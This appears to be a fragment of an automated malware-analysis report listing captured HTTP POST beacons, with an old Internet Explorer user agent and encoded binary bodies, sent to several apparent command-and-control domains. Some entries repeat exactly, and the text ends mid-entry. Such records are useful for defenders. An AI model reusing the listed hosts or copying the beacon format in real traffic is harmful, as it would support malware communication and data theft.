hhXEFbVDeJg2ipBrHIExgq7loTlDGQ5MuVu86b4fpkKXLwodQicA28qB/E+Gohd5Us/tKH0XjhtnAu86GZwudF0x1q6sIVTzvzuvnmze/x5Gu9AeGBE7K4oEInTP7YnZU/+BFrP51j8va7f/mYSFBkMU90RF5pXAsMK1QR2Shodho5ZfOlKzeTubZBM2lu855H0oTld2VkAfIw3ielcKBrPGZgX3y/tq2smc6Kj6OUn4PWYyor+4Qk86kBL0YFVQsOgoknpR9ktJtM69W+eqtikLBWAzUoKXV+D4PfEqZ5B/izlbe6vkZ2Dsy1sS6B5P/QAO+/xOx3XNrL6r2NE735UAJ1Up3gXG4Mry8VP8MEdwjvoGiKoJq5t9ezfUvWiCq0zXeKiMWQlgyY9m3NXZZWZFchPo3cOIZfcTg+Py5xQtMNGcr6nPkpj9M0cvbNPNbo0FATYLCWgvd4RZBW7iqLcJ/a7SgFXWRV+GBIYo4U5VV0m27PzqfKa9EpE4sbOpscoaj0umnazCO85Rqkqvm25v0Wr6Rs1wobBklp5Df9gVavuTyGBBF9/RLA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 68 78 56 66 36 42 47 37 6a 35 68 71 49 56 4b 76 73 44 6e 74 68 47 72 42 4a 42 6a 50 36 5a 77 78 31 54 6f 33 79 72 57 4f 7a 48 35 56 52 31 51 30 70 5a 79 6d 6b 57 58 38 39 35 4d 51 49 68 70 4d 65 58 30 64 63 62 7a 59 71 68 4a 62 54 4d 2f 7a 75 4e 59 79 59 35 5a 78 45 44 64 36 5a 41 61 65 69 65 52 43 56 73 71 71 32 6a 32 39 66 52 5a 59 37 44 64 55 30 2f 78 78 5a 56 51 54 38 66 43 47 4f 42 2f 4c 62 4f 6f 5a 2f 78 36 37 2f 4d 7a 73 6e 32 30 4e 31 6c 54 6e 42 6b 41 64 4e 50 7a 6b 30 32 2b 33 53 33 56 39 4e 6a 7a 78 6c 66 2f 4f 46 4e 32 62 6d 69 44 6c 78 58 6e 77 73 36 37 41 75 38 34 38 75 6d 30 51 33 30 33 43 2f 4f 37 37 66 48 51 74 4d 6d 34 2b 37 47 47 77 56 76 46 6b 4e 51 6e 36 59 64 71 4c 79 44 7a 4d 52 4d 62 6d 4a 70 76 6b 62 39 64 41 65 6a 75 33 76 31 41 6a 61 49 62 67 54 6b 75 6c 47 70 72 56 4d 72 64 45 79 6e 53 74 34 34 74 67 4c 38 2b 75 2b 72 56 2f 51 65 69 79 2b 44 4c 62 63 71 6b 68 73 69 73 74 30 4c 4b 74 6a 43 51 37 30 71 67 73 63 61 68 47 71 73 36 7a 47 55 6e 2b 6a 50 75 58 70 61 4c 50 61 32 47 48 76 79 59 44 54 4c 73 73 4a 41 31 65 58 4a 41 6b 4a 4e 69 45 38 36 4c 50 4b 4a 50 72 74 70 53 35 45 6e 76 78 62 39 32 73 42 4d 53 69 41 6d 70 70 57 59 69 36 69 72 77 2b 6d 78 57 59 70 4d 58 57 34 33 56 51 44 43 46 49 59 45 6a 6e 6b 74 54 6e 67 4a 4d 48 65 30 6d 6d 69 49 45 57 43 33 46 53 6e 59 69 34 62 30 6b 34 34 55 62 4b 6b 4b 2b 38 30 35 76 74 4e 33 4a 50 6d 36 63 34 68 4c 77 39 48 48 63 52 52 7a 6e 37 38 41 35 2b 72 45 64 7a 59 56 6b 43 71 4d 43 41 51 68 4a 79 66 65 34 6c 68 33 63 2f 41 48 68 6d 55 76 65 70 78 39 73 66 63 56 70 69 56 53 36 41 33 6c 31 47 49 55 69 50 52 67 6d 2b 6e 49 35 7a 33 35 4c 68 31 67 6c 44 4e 45 4e 47 6c 54 45 3d Data Ascii: hxVf6BG7j5hqIVKvsDnthGrBJBjP6Zwx1To3yrWOzH5VR1Q0pZymkWX895MQIhpMeX0dcbzYqhJbTM/zuNYyY5ZxEDd6ZAaeieRCVsqq2j29fRZY7DdU0/xxZVQT8fCGOB/LbOoZ/x67/Mzsn20N1lTnBkAdNPzk02+3S3V9Njzxlf/OFN2bmiDlxXnws67Au848um0Q303C/O77fHQtMm4+7GGwVvFkNQn6YdqLyDzMRMbmJpvkb9dAeju3v1AjaIbgTkulGprVMrdEynSt44tgL8+u+rV/Qeiy+DLbcqkhsist0LKtjCQ70qgscahGqs6zGUn+jPuXpaLPa2GHvyYDTLssJA1eXJAkJNiE86LPKJPrtpS5Envxb92sBMSiAmppWYi6irw+mxWYpMXW43VQDCFIYEjnktTngJMHe0mmiIEWC3FSnYi4b0k44UbKkK+805vtN3JPm6c4hLw9HHcRRzn78A5+rEdzYVkCqMCAQhJyfe4lh3c/AHhmUvepx9sfcVpiVS6A3l1GIUiPRgm+nI5z35Lh1glDNENGlTE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 67 73 79 61 36 70 67 4f 73 5a 67 51 50 62 4e 58 6d 30 45 56 39 6f 74 70 73 59 35 67 44 63 53 73 54 42 74 46 4b 5a 4b 64 2f 68 53 4b 72 53 57 64 6c 42 79 48 46 67 4f 57 65 37 57 66 6b 7a 4f 67 57 73 45 6f 45 50 67 6b 48 36 57 59 62 66 77 67 56 35 56 59 42 42 56 7a 37 49 67 4d 34 65 67 71 53 44 4b 50 38 61 6a 36 6b 41 6c 57 67 77 39 39 49 74 4b 4e 50 56 65 65 78 58 31 38 4f 2f 36 48 2f 42 54 61 7a 73 55 6b 63 48 51 79 48 6d 72 68 68 54 69 51 4d 45 70 67 61 77 67 68 51 39 6a 36 47 2f 47 77 2f 34 4e 64 30 6e 42 46 78 6c 63 4d 47 43 41 62 73 59 41 44 31 79 37 47 65 4b 74 79 70 7a 76 66 64 6d 7a 36 42 35 2f 65 70 52 75 71 78 57 67 56 34 2b 59 52 32 38 6c 58 34 72 44 32 71 2b 70 5a 4e 78 7a 59 6d 77 52 37 46 38 52 64 72 55 46 33 2b 34 79 52 65 59 74 6c 4c 7a 69 35 39 68 39 62 6e 63 58 66 4c 4a 58 75 45 5a 71 69 4b 52 52 57 6d 2f 59 52 6c 4a 63 75 54 6d 78 76 33 53 49 68 59 63 50 31 50 37 39 55 61 72 41 52 65 67 2b 4c 48 74 43 74 79 59 72 6b 61 46 43 53 6d 33 74 35 57 62 44 2f 66 43 72 39 72 63 53 4f 45 53 2b 39 6b 71 74 47 52 35 65 70 4b 44 54 69 61 33 73 71 61 6e 2f 46 4d 44 52 46 45 31 78 66 52 54 4e 38 79 4e 58 66 46 4c 6f 4f 52 39 41 47 6e 62 5a 41 65 35 55 50 31 2f 48 33 2f 6d 6e 7a 33 6f 46 77 78 54 62 38 43 58 6e 5a 4e 64 58 4a 48 5a 4b 6b 66 6a 77 51 6a 74 70 59 76 51 7a 55 53 76 30 59 2b 44 55 6c 51 48 52 4b 6d 78 4a 6f 72 70 48 43 71 39 44 65 73 41 37 5a 49 48 58 64 7a 63 30 74 63 50 6a 73 62 4b 72 42 6b 6c 76 72 6f 75 59 4f 4b 65 78 71 31 7a 54 45 4d 6b 43 2f 36 68 64 67 78 7a 73 64 71 6c 30 46 43 57 33 32 4e 6e 46 5a 4f 68 73 44 63 43 48 39 63 77 6d 30 78 4e 33 67 66 52 4a 5a 4b 4b 65 4a 48 48 51 76 53 39 6a 35 Data Ascii: gsya6pgOsZgQPbNXm0EV9otpsY5gDcSsTBtFKZKd/hSKrSWdlByHFgOWe7WfkzOgWsEoEPgkH6WYbfwgV5VYBBVz7IgM4egqSDKP8aj6kAlWgw99ItKNPVeexX18O/6H/BTazsUkcHQyHmrhhTiQMEpgawghQ9j6G/Gw/4Nd0nBFxlcMGCAbsYAD1y7GeKtypzvfdmz6B5/epRuqxWgV4+YR28lX4rD2q+pZNxzYmwR7F8RdrUF3+4yReYtlLzi59h9bncXfLJXuEZqiKRRWm/YRlJcuTmxv3SIhYcP1P79UarAReg+LHtCtyYrkaFCSm3t5WbD/fCr9rcSOES+9kqtGR5epKDTia3sqan/FMDRFE1xfRTN8yNXfFLoOR9AGnbZAe5UP1/H3/mnz3oFwxTb8CXnZNdXJHZKkfjwQjtpYvQzUSv0Y+DUlQHRKmxJorpHCq9DesA7ZIHXdzc0tcPjsbKrBklvrouYOKexq1zTEMkC/6hdgxzsdql0FCW32NnFZOhsDcCH9cwm0xN3gfRJZKKeJHHQvS9j5
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 70 4c 63 59 36 4c 37 35 73 4a 67 75 38 77 34 6b 69 56 5a 37 35 4b 46 4e 64 57 46 2b 31 72 32 7a 30 70 31 66 6b 53 65 5a 52 66 71 30 62 78 46 2f 58 6c 78 46 6f 47 68 34 6d 34 49 7a 63 41 4e 37 78 75 72 7a 31 71 36 6d 66 78 6e 49 4a 30 71 35 73 67 2b 48 71 73 78 62 56 51 4e 35 6a 41 41 69 41 55 4f 36 6e 44 54 77 56 62 4d 72 78 2b 4c 61 33 34 72 6f 6a 55 68 70 52 78 36 4a 6e 69 43 6d 4a 47 61 63 6d 45 5a 41 35 42 35 45 61 42 76 74 59 32 2f 47 35 55 4c 52 42 79 56 2f 42 77 66 54 69 4f 37 69 30 4d 53 70 5a 64 35 38 58 46 49 34 56 78 67 5a 58 54 53 36 78 6c 64 4d 5a 4b 69 34 6f 59 78 6c 72 32 4a 30 52 76 33 4b 75 76 51 61 74 7a 55 51 4d 6f 76 58 74 63 6a 70 49 65 31 41 7a 34 52 4c 4f 4f 34 6f 4a 66 79 35 53 42 4f 51 41 2b 57 2f 6e 56 66 67 33 49 54 54 6d 41 4f 69 50 36 4c 4b 6e 61 47 67 55 6f 5a 6e 33 71 4e 58 51 71 2f 4e 62 79 66 2b 61 34 39 7a 55 67 55 7a 75 51 50 58 4a 62 70 31 6b 75 63 4d 67 46 34 4b 32 46 67 73 4e 54 33 58 34 77 7a 73 4c 77 57 58 58 4b 42 68 71 31 39 65 65 6b 4c 73 74 46 53 4c 41 62 2f 4f 62 35 54 55 6b 57 37 35 6d 43 42 57 6c 45 55 35 45 41 58 41 6e 71 66 52 63 77 72 58 61 71 57 53 6c 61 76 39 66 35 47 78 6e 41 72 4b 73 42 64 6e 70 38 5a 33 67 69 32 65 75 6f 34 55 78 53 58 58 31 57 34 69 33 70 4d 39 32 4d 75 68 33 4a 71 52 46 68 55 4f 70 42 36 77 6e 4a 74 39 6e 74 39 55 64 65 43 4d 61 46 41 48 75 38 4f 57 75 45 59 5a 32 53 64 69 79 50 69 6b 79 54 32 71 6d 41 72 39 4a 73 49 34 69 56 6c 7a 62 77 78 69 78 57 61 39 75 6f 54 4b 57 63 72 44 79 62 34 66 44 6b 32 50 61 53 7a 66 61 63 4d 70 59 78 36 56 4b 74 4d 71 4d 6c 56 44 61 48 6a 42 6e 43 4d 61 30 41 2f 67 54 70 67 75 6b 55 4e 7a 4d 6a 6f 63 74 78 77 3d Data Ascii: pLcY6L75sJgu8w4kiVZ75KFNdWF+1r2z0p1fkSeZRfq0bxF/XlxFoGh4m4IzcAN7xurz1q6mfxnIJ0q5sg+HqsxbVQN5jAAiAUO6nDTwVbMrx+La34rojUhpRx6JniCmJGacmEZA5B5EaBvtY2/G5ULRByV/BwfTiO7i0MSpZd58XFI4VxgZXTS6xldMZKi4oYxlr2J0Rv3KuvQatzUQMovXtcjpIe1Az4RLOO4oJfy5SBOQA+W/nVfg3ITTmAOiP6LKnaGgUoZn3qNXQq/Nbyf+a49zUgUzuQPXJbp1kucMgF4K2FgsNT3X4wzsLwWXXKBhq19eekLstFSLAb/Ob5TUkW75mCBWlEU5EAXAnqfRcwrXaqWSlav9f5GxnArKsBdnp8Z3gi2euo4UxSXX1W4i3pM92Muh3JqRFhUOpB6wnJt9nt9UdeCMaFAHu8OWuEYZ2SdiyPikyT2qmAr9JsI4iVlzbwxixWa9uoTKWcrDyb4fDk2PaSzfacMpYx6VKtMqMlVDaHjBnCMa0A/gTpgukUNzMjoctxw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 2b 4e 65 4c 35 44 6e 63 73 4a 6a 32 63 71 6f 36 79 4e 69 35 39 74 49 45 72 75 34 58 4e 70 68 63 66 64 72 4f 31 63 30 41 53 2b 57 32 65 69 68 64 4f 6a 34 5a 42 4c 46 75 76 32 33 76 6c 56 52 7a 44 4a 77 68 46 70 7a 77 57 4f 76 72 51 4d 35 35 42 50 73 74 41 49 34 49 4e 37 75 31 53 67 56 56 4e 70 75 5a 33 34 6c 48 2b 4f 6d 76 57 56 4a 4f 52 41 59 52 6c 38 57 50 4e 6a 65 6a 76 41 78 72 6a 73 47 48 53 6f 71 47 44 48 55 6d 49 59 37 72 61 4f 6b 59 64 56 32 45 39 6c 73 53 72 2b 34 34 70 31 61 53 4d 49 37 78 6f 53 54 59 65 77 48 35 73 51 4d 33 55 46 56 46 67 51 2f 78 67 48 31 63 70 2b 70 79 41 77 46 2f 53 56 65 78 78 39 2b 64 4d 50 35 69 49 6b 5a 42 42 38 7a 30 48 58 2b 43 78 63 6a 38 32 65 73 5a 44 73 4d 78 34 64 42 4a 6a 44 71 6e 74 54 42 64 69 31 37 61 55 36 66 2b 39 61 44 42 33 69 49 6c 5a 52 52 52 6f 41 4f 6c 41 6c 55 34 73 73 51 52 67 42 69 57 6d 69 62 6d 44 62 55 73 30 65 72 47 64 78 4c 2f 52 57 52 6d 4d 65 47 5a 31 53 32 4e 4d 6f 68 65 61 78 63 63 2f 47 65 4f 55 34 55 35 6f 71 2f 43 4e 42 69 4e 5a 5a 72 2b 75 4e 47 50 4e 62 4a 6f 2f 5a 45 4d 30 77 6f 73 64 76 38 32 55 4f 79 6e 66 6d 7a 4d 64 64 4b 66 33 31 72 6a 75 6f 2b 61 32 6f 73 32 44 32 69 72 79 49 54 49 33 76 35 6a 56 64 41 36 38 64 72 55 49 30 59 67 59 63 39 70 42 49 49 59 4d 5a 4d 49 46 68 30 7a 6c 31 2b 4f 77 42 35 31 52 5a 6f 73 35 52 68 2b 35 61 70 79 6a 64 56 66 77 73 2b 58 7a 56 75 2b 74 70 45 59 69 52 30 50 49 76 78 57 32 59 73 51 44 32 49 32 53 65 2b 71 68 55 45 6a 55 59 38 4c 73 2b 4d 74 2f 6d 30 76 5a 54 30 46 4f 55 6f 33 70 2b 4f 36 70 4e 69 6c 79 72 36 78 61 35 6d 66 35 69 59 66 7a 6f 63 2b 5a 72 71 73 47 41 31 4b 79 33 66 4d Data Ascii: +NeL5DncsJj2cqo6yNi59tIEru4XNphcfdrO1c0AS+W2eihdOj4ZBLFuv23vlVRzDJwhFpzwWOvrQM55BPstAI4IN7u1SgVVNpuZ34lH+OmvWVJORAYRl8WPNjejvAxrjsGHSoqGDHUmIY7raOkYdV2E9lsSr+44p1aSMI7xoSTYewH5sQM3UFVFgQ/xgH1cp+pyAwF/SVexx9+dMP5iIkZBB8z0HX+Cxcj82esZDsMx4dBJjDqntTBdi17aU6f+9aDB3iIlZRRRoAOlAlU4ssQRgBiWmibmDbUs0erGdxL/RWRmMeGZ1S2NMoheaxcc/GeOU4U5oq/CNBiNZZr+uNGPNbJo/ZEM0wosdv82UOynfmzMddKf31rjuo+a2os2D2iryITI3v5jVdA68drUI0YgYc9pBIIYMZMIFh0zl1+OwB51RZos5Rh+5apyjdVfws+XzVu+tpEYiR0PIvxW2YsQD2I2Se+qhUEjUY8Ls+Mt/m0vZT0FOUo3p+O6pNilyr6xa5mf5iYfzoc+ZrqsGA1Ky3fM
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 70 4c 63 59 36 4c 37 35 73 4a 67 75 38 77 34 6b 69 56 5a 37 35 4b 46 4e 64 57 46 2b 31 72 32 7a 30 70 31 66 6b 53 65 5a 52 66 71 30 62 78 46 2f 58 6c 78 46 6f 47 68 34 6d 34 49 7a 63 41 4e 37 78 75 72 7a 31 71 36 6d 66 78 6e 49 4a 30 71 35 73 67 2b 48 71 73 78 62 56 51 4e 35 6a 41 41 69 41 55 4f 36 6e 44 54 77 56 62 4d 72 78 2b 4c 61 33 34 72 6f 6a 55 68 70 52 78 36 4a 6e 69 43 6d 4a 47 61 63 6d 45 5a 41 35 42 35 45 61 42 76 74 59 32 2f 47 35 55 4c 52 42 79 56 2f 42 77 66 54 69 4f 37 69 30 4d 53 70 5a 64 35 38 58 46 49 34 56 78 67 5a 58 54 53 36 78 6c 64 4d 5a 4b 69 34 6f 59 78 6c 72 32 4a 30 52 76 33 4b 75 76 51 61 74 7a 55 51 4d 6f 76 58 74 63 6a 70 49 65 31 41 7a 34 52 4c 4f 4f 34 6f 4a 66 79 35 53 42 4f 51 41 2b 57 2f 6e 56 66 67 33 49 54 54 6d 41 4f 69 50 36 4c 4b 6e 61 47 67 55 6f 5a 6e 33 71 4e 58 51 71 2f 4e 62 79 66 2b 61 34 39 7a 55 67 55 7a 75 51 50 58 4a 62 70 31 6b 75 63 4d 67 46 34 4b 32 46 67 73 4e 54 33 58 34 77 7a 73 4c 77 57 58 58 4b 42 68 71 31 39 65 65 6b 4c 73 74 46 53 4c 41 62 2f 4f 62 35 54 55 6b 57 37 35 6d 43 42 57 6c 45 55 35 45 41 58 41 6e 71 66 52 63 77 72 58 61 71 57 53 6c 61 76 39 66 35 47 78 6e 41 72 4b 73 42 64 6e 70 38 5a 33 67 69 32 65 75 6f 34 55 78 53 58 58 31 57 34 69 33 70 4d 39 32 4d 75 68 33 4a 71 52 46 68 55 4f 70 42 36 77 6e 4a 74 39 6e 74 39 55 64 65 43 4d 61 46 41 48 75 38 4f 57 75 45 59 5a 32 53 64 69 79 50 69 6b 79 54 32 71 6d 41 72 39 4a 73 49 34 69 56 6c 7a 62 77 78 69 78 57 61 39 75 6f 54 4b 57 63 72 44 79 62 34 66 44 6b 32 50 61 53 7a 66 61 63 4d 70 59 78 36 56 4b 74 4d 71 4d 6c 56 44 61 48 6a 42 6e 43 4d 61 30 41 2f 67 54 70 67 75 6b 55 4e 7a 4d 6a 6f 63 74 78 77 3d Data Ascii: pLcY6L75sJgu8w4kiVZ75KFNdWF+1r2z0p1fkSeZRfq0bxF/XlxFoGh4m4IzcAN7xurz1q6mfxnIJ0q5sg+HqsxbVQN5jAAiAUO6nDTwVbMrx+La34rojUhpRx6JniCmJGacmEZA5B5EaBvtY2/G5ULRByV/BwfTiO7i0MSpZd58XFI4VxgZXTS6xldMZKi4oYxlr2J0Rv3KuvQatzUQMovXtcjpIe1Az4RLOO4oJfy5SBOQA+W/nVfg3ITTmAOiP6LKnaGgUoZn3qNXQq/Nbyf+a49zUgUzuQPXJbp1kucMgF4K2FgsNT3X4wzsLwWXXKBhq19eekLstFSLAb/Ob5TUkW75mCBWlEU5EAXAnqfRcwrXaqWSlav9f5GxnArKsBdnp8Z3gi2euo4UxSXX1W4i3pM92Muh3JqRFhUOpB6wnJt9nt9UdeCMaFAHu8OWuEYZ2SdiyPikyT2qmAr9JsI4iVlzbwxixWa9uoTKWcrDyb4fDk2PaSzfacMpYx6VKtMqMlVDaHjBnCMa0A/gTpgukUNzMjoctxw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 57 62 62 33 37 44 73 69 73 5a 6a 47 64 65 46 55 30 6a 4c 55 36 43 54 30 64 49 5a 42 57 51 2b 30 6e 31 63 54 50 6a 54 4c 66 53 64 6c 72 6e 6f 49 4d 78 57 4d 65 6c 74 39 4c 4c 5a 67 38 6f 39 2f 41 46 78 65 38 35 65 75 38 6e 77 53 5a 79 4c 45 78 49 36 2b 43 54 50 55 6a 58 61 79 2b 52 74 78 35 52 32 69 42 50 56 44 6e 57 4e 37 61 48 4a 56 59 32 4f 4b 64 68 2b 77 57 67 6e 64 73 73 59 6f 6c 43 48 56 6f 78 59 6c 6f 49 55 6f 53 47 55 78 46 61 55 33 56 42 74 4c 37 55 61 35 68 55 62 79 43 68 30 6e 2b 35 58 59 43 69 34 57 6f 33 57 47 43 73 59 49 30 6d 73 54 67 4d 77 55 70 4f 61 35 69 77 4c 39 52 4f 64 4d 74 69 5a 55 71 39 71 75 33 73 76 6e 54 5a 52 45 55 58 42 6f 35 71 44 46 72 34 67 33 4c 53 55 77 62 49 77 4e 69 4e 51 56 65 57 7a 6c 44 48 63 74 75 34 68 77 33 53 44 6f 59 30 4c 33 46 30 4d 67 4b 6f 53 64 72 57 67 39 2b 69 45 67 7a 53 6a 50 6d 59 65 72 56 50 6b 36 35 38 58 50 73 64 66 61 4c 49 38 78 42 78 49 55 38 54 71 6c 4a 64 33 55 7a 56 4b 64 31 56 67 41 62 79 2b 30 45 46 4d 79 52 56 71 75 50 5a 48 4f 61 78 75 43 37 39 33 64 73 76 51 56 74 4b 6a 38 78 4f 4a 6f 4e 73 52 4d 57 41 4f 4d 4a 66 64 43 39 4f 2b 49 47 42 70 55 4c 46 33 76 48 75 6a 62 32 30 6e 33 73 48 73 58 33 76 2b 6a 2b 2f 5a 6c 71 7a 76 65 78 62 63 39 33 47 76 66 75 78 49 63 7a 6e 6f 52 67 5a 73 4c 33 4e 66 30 4a 78 72 30 30 33 72 57 72 38 6d 59 33 4e 44 59 71 6f 70 32 30 4c 46 72 6c 6f 2f 47 31 76 46 6a 64 70 70 62 4d 46 43 4a 34 57 79 68 4f 4f 73 68 36 6a 78 43 48 6b 2b 38 4c 31 75 51 35 71 59 57 4f 4c 65 4d 67 41 51 45 6c 37 4c 2b 6e 7a 53 5a 66 65 46 76 54 69 55 2f 30 51 52 39 6e 62 71 63 4f 59 74 42 59 6d 7a 31 51 79 32 32 63 44 56 55 65 34 73 58 69 79 49 3d Data Ascii: Wbb37DsisZjGdeFU0jLU6CT0dIZBWQ+0n1cTPjTLfSdlrnoIMxWMelt9LLZg8o9/AFxe85eu8nwSZyLExI6+CTPUjXay+Rtx5R2iBPVDnWN7aHJVY2OKdh+wWgndssYolCHVoxYloIUoSGUxFaU3VBtL7Ua5hUbyCh0n+5XYCi4Wo3WGCsYI0msTgMwUpOa5iwL9ROdMtiZUq9qu3svnTZREUXBo5qDFr4g3LSUwbIwNiNQVeWzlDHctu4hw3SDoY0L3F0MgKoSdrWg9+iEgzSjPmYerVPk658XPsdfaLI8xBxIU8TqlJd3UzVKd1VgAby+0EFMyRVquPZHOaxuC793dsvQVtKj8xOJoNsRMWAOMJfdC9O+IGBpULF3vHujb20n3sHsX3v+j+/Zlqzvexbc93GvfuxIcznoRgZsL3Nf0Jxr003rWr8mY3NDYqop20LFrlo/G1vFjdppbMFCJ4WyhOOsh6jxCHk+8L1uQ5qYWOLeMgAQEl7L+nzSZfeFvTiU/0QR9nbqcOYtBYmz1Qy22cDVUe4sXiyI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 6f 32 68 36 36 39 63 56 73 5a 68 43 46 31 6e 34 78 72 6b 66 72 69 44 61 47 4e 41 4e 65 77 6a 50 2b 78 61 61 30 35 30 31 39 57 61 41 47 4a 76 46 4e 38 46 55 38 63 74 7a 41 56 55 38 6d 63 62 49 62 73 38 6e 39 2b 6d 46 54 54 4f 64 6d 50 2f 76 6e 49 30 4c 53 67 4a 46 2b 6e 70 4f 76 69 67 57 71 52 68 69 63 76 70 39 31 6e 77 62 33 68 69 4e 74 2f 73 56 76 6d 69 62 57 78 33 33 68 34 54 51 76 66 78 53 7a 63 55 62 4e 64 66 69 35 41 76 41 72 45 35 70 31 47 44 79 4f 66 34 74 56 2b 65 57 31 4f 41 32 33 39 73 72 43 2b 42 6e 45 4e 39 4b 42 4f 43 58 6a 36 4c 35 43 4d 62 69 45 59 65 55 32 76 6e 69 4a 47 53 53 37 37 4b 46 4f 67 41 6c 4b 63 2f 4d 63 55 32 37 4b 38 46 48 59 61 67 51 34 66 61 36 4d 79 4b 48 6e 62 69 4b 6e 2b 6e 41 50 31 75 6b 65 45 48 2b 63 53 71 72 55 76 4d 7a 6c 2f 61 73 6a 36 43 5a 6c 6e 67 78 58 52 61 79 44 63 73 76 69 37 50 6a 74 57 73 4b 4c 76 54 57 44 68 6c 39 76 71 5a 6d 35 6a 4c 31 74 6f 38 66 43 78 49 66 4f 44 6d 49 49 4a 75 6b 56 62 46 6f 4b 32 51 49 49 6c 79 76 33 6e 64 76 43 57 43 64 71 34 32 5a 32 39 6f 50 67 5a 5a 43 68 62 58 4a 4f 68 51 30 67 6c 78 4e 77 4e 35 41 63 78 6e 69 66 66 34 74 6b 4b 78 52 73 73 4e 59 70 36 4c 4e 59 67 53 4b 4e 5a 37 42 57 56 59 31 4b 6c 4b 6c 63 75 6a 72 6c 34 6c 71 6d 50 6c 76 2f 6e 32 7a 55 4b 39 68 77 49 47 77 35 41 38 2f 59 4e 6b 69 67 38 53 4e 62 4a 6b 55 57 6c 41 78 4e 6c 32 34 59 50 42 50 66 6c 68 4f 6a 64 32 38 75 58 52 37 73 4c 55 4b 54 32 4e 44 6f 6f 35 70 44 47 69 63 52 72 6e 43 5a 49 4d 55 6f 34 6c 41 52 31 45 30 6d 35 75 45 4d 41 63 74 6b 31 6e 6a 52 6f 54 69 56 55 66 6e 75 4d 6c 4d 41 36 54 4d 43 56 55 47 55 79 46 64 4e 59 33 2f 4f 70 6a 50 Data Ascii: o2h669cVsZhCF1n4xrkfriDaGNANewjP+xaa05019WaAGJvFN8FU8ctzAVU8mcbIbs8n9+mFTTOdmP/vnI0LSgJF+npOvigWqRhicvp91nwb3hiNt/sVvmibWx33h4TQvfxSzcUbNdfi5AvArE5p1GDyOf4tV+eW1OA239srC+BnEN9KBOCXj6L5CMbiEYeU2vniJGSS77KFOgAlKc/McU27K8FHYagQ4fa6MyKHnbiKn+nAP1ukeEH+cSqrUvMzl/asj6CZlngxXRayDcsvi7PjtWsKLvTWDhl9vqZm5jL1to8fCxIfODmIIJukVbFoK2QIIlyv3ndvCWCdq42Z29oPgZZChbXJOhQ0glxNwN5Acxniff4tkKxRssNYp6LNYgSKNZ7BWVY1KlKlcujrl4lqmPlv/n2zUK9hwIGw5A8/YNkig8SNbJkUWlAxNl24YPBPflhOjd28uXR7sLUKT2NDoo5pDGicRrnCZIMUo4lAR1E0m5uEMActk1njRoTiVUfnuMlMA6TMCVUGUyFdNY3/OpjP
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 57 62 62 33 37 44 73 69 73 5a 6a 47 64 65 46 55 30 6a 4c 55 36 43 54 30 64 49 5a 42 57 51 2b 30 6e 31 63 54 50 6a 54 4c 66 53 64 6c 72 6e 6f 49 4d 78 57 4d 65 6c 74 39 4c 4c 5a 67 38 6f 39 2f 41 46 78 65 38 35 65 75 38 6e 77 53 5a 79 4c 45 78 49 36 2b 43 54 50 55 6a 58 61 79 2b 52 74 78 35 52 32 69 42 50 56 44 6e 57 4e 37 61 48 4a 56 59 32 4f 4b 64 68 2b 77 57 67 6e 64 73 73 59 6f 6c 43 48 56 6f 78 59 6c 6f 49 55 6f 53 47 55 78 46 61 55 33 56 42 74 4c 37 55 61 35 68 55 62 79 43 68 30 6e 2b 35 58 59 43 69 34 57 6f 33 57 47 43 73 59 49 30 6d 73 54 67 4d 77 55 70 4f 61 35 69 77 4c 39 52 4f 64 4d 74 69 5a 55 71 39 71 75 33 73 76 6e 54 5a 52 45 55 58 42 6f 35 71 44 46 72 34 67 33 4c 53 55 77 62 49 77 4e 69 4e 51 56 65 57 7a 6c 44 48 63 74 75 34 68 77 33 53 44 6f 59 30 4c 33 46 30 4d 67 4b 6f 53 64 72 57 67 39 2b 69 45 67 7a 53 6a 50 6d 59 65 72 56 50 6b 36 35 38 58 50 73 64 66 61 4c 49 38 78 42 78 49 55 38 54 71 6c 4a 64 33 55 7a 56 4b 64 31 56 67 41 62 79 2b 30 45 46 4d 79 52 56 71 75 50 5a 48 4f 61 78 75 43 37 39 33 64 73 76 51 56 74 4b 6a 38 78 4f 4a 6f 4e 73 52 4d 57 41 4f 4d 4a 66 64 43 39 4f 2b 49 47 42 70 55 4c 46 33 76 48 75 6a 62 32 30 6e 33 73 48 73 58 33 76 2b 6a 2b 2f 5a 6c 71 7a 76 65 78 62 63 39 33 47 76 66 75 78 49 63 7a 6e 6f 52 67 5a 73 4c 33 4e 66 30 4a 78 72 30 30 33 72 57 72 38 6d 59 33 4e 44 59 71 6f 70 32 30 4c 46 72 